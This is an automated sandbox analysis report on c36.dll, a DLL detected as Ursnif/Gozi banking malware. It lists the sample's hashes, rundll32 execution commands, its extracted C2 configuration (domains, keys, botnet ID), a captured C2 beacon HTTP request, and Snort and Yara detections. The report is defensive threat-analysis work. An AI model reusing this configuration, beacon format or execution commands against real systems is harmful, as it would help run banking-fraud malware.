
Windows Analysis Report c36.dll

Overview

General Information

Sample Name: c36.dll
Analysis ID: 446420
MD5: c36ab737db2b6d11fb1f443f8117a7fa
SHA1: e6fab2798dd6088aa3527a01ae1b3f2415cf40cf
SHA256: 181fe6714ebaff8c1855e8e1dbac545ffd160df0ec96ddf920c5155916b7111b
Tags: dll, gozi
Detection

Ursnif
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4796 cmdline: loaddll32.exe 'C:\Users\user\Desktop\c36.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 1636 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1844 cmdline: rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1488 cmdline: rundll32.exe C:\Users\user\Desktop\c36.dll,Beautyresult MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1632 cmdline: rundll32.exe C:\Users\user\Desktop\c36.dll,Division MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 1948 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 852 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 5520 cmdline: rundll32.exe C:\Users\user\Desktop\c36.dll,Fastcolor MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2616 cmdline: rundll32.exe C:\Users\user\Desktop\c36.dll,Yetclose MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 5468 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 3008 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5468 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "1mPXe+HluarwW4R5yJj7kX696atmf6B7a6Jg5mZJ5i3sbRT19R7vT9mKoTtyIRImiHldxTU8DG3omytA0iEqz9hnZgVFnIpVKjKYSqpF7qVSkNASqDhbMdx0CqPxwgtnM3yHiXHYSYrxlGineE5/W0Lx89hsKcfonC8W/kvncnBH4KqUVMOPQeg/25xF11Xm", "c2_domain": ["outlook.com", "mail.com", "taybhctdyehfhgthp2.xyz", "thyihjtkylhmhnypp2.xyz"], "botnet": "5456", "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(15 further entries not expanded in this capture)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000006.00000003.310307247.0000000001130000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "1mPXe+HluarwW4R5yJj7kX696atmf6B7a6Jg5mZJ5i3sbRT19R7vT9mKoTtyIRImiHldxTU8DG3omytA0iEqz9hnZgVFnIpVKjKYSqpF7qVSkNASqDhbMdx0CqPxwgtnM3yHiXHYSYrxlGineE5/W0Lx89hsKcfonC8W/kvncnBH4KqUVMOPQeg/25xF11Xm", "c2_domain": ["outlook.com", "mail.com", "taybhctdyehfhgthp2.xyz", "thyihjtkylhmhnypp2.xyz"], "botnet": "5456", "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
Source: c36.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.401542814.0000000003492000.00000004.00000001.sdmp
Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
Source: Binary string: ntmarta.pdby1Zs# source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: c:\Door\26\Enter\Mos\Hard \Stretch.pdb source: loaddll32.exe, 00000002.00000002.484014411.000000006E1EB000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.487526023.000000006E1EB000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.386861374.000000006E1EB000.00000002.00020000.sdmp, c36.dll
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbT? source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001A.00000003.401542814.0000000003492000.00000004.00000001.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
Source: Binary string: msctf.pdbG1xs( source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: WinTypes.pdbK1dsg& source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
Source: Binary string: combase.pdbgB source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49729 -> 40.97.128.194:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49729 -> 40.97.128.194:80
Source: Joe Sandbox View | IP Address: 40.97.128.194 40.97.128.194
Source: global traffic | HTTP traffic detected:
  GET /jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2F/gFwgPVc3A_2BGFDYWcxhxu6/95nq35D0eQ/F_2Bmi0291iuqGJ2R/Lk7llVNKTp1W/ZOLoPeu_2F4/nTZWoYdvVj3RXx/XwwFNQtzd_2FkWk0UpQTO/wz8fmYfCTc8Ok1p_/2Bs3Gpetltr/L74Ig5cboZ/m.crw HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: outlook.com
  Connection: Keep-Alive
Source: msapplication.xml0.24.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.24.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.24.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.24.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.24.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.24.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown | DNS traffic detected: queries for: outlook.com
Source: msapplication.xml.24.dr | String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.24.dr | String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.24.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.24.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.24.dr | String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.24.dr | String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.24.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.24.dr | String found in binary or memory: http://www.youtube.com/
Source: {6C6C1DAB-E104-11EB-90E4-ECF4BB862DED}.dat.24.dr | String found in binary or memory: https://outlook.office365.com/jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 4796, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 1844, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 4796, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 1844, type: MEMORY

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A1996 GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A1A44 NtMapViewOfSection,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A23A5 NtQueryVirtualMemory,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EA5A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EAB1A5 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_01185A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0118B1A5 NtQueryVirtualMemory,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A2184
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EA3EE1
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EA888E
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EAAF80
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1CA260
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1CD1F0
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1E8559
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1DEDC4
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1DC5EB
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1CDA30
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1E7AD1
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1E8015
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1D68E0
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1EA1BF
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1C99A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0118AF80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0118888E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_01183EE1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1CA260
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1CD1F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1E8559
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1DEDC4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1DC5EB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1CDA30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1E7AD1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1E8015
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1D68E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1EA1BF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1C99A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1CA260
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1CD1F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1E8559
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1DEDC4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1DC5EB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1CDA30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1E7AD1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1E8015
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1D68E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1EA1BF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1C99A0
            Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E1D9D10 appears 49 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E1D9D10 appears 98 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E1DBFE0 appears 48 times
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 852
            Source: c36.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: classification engineClassification label: mal72.troj.winDLL@17/18@3/3
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EAA65C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1632
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFD1208600E5902E85.TMPJump to behavior
            Source: c36.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
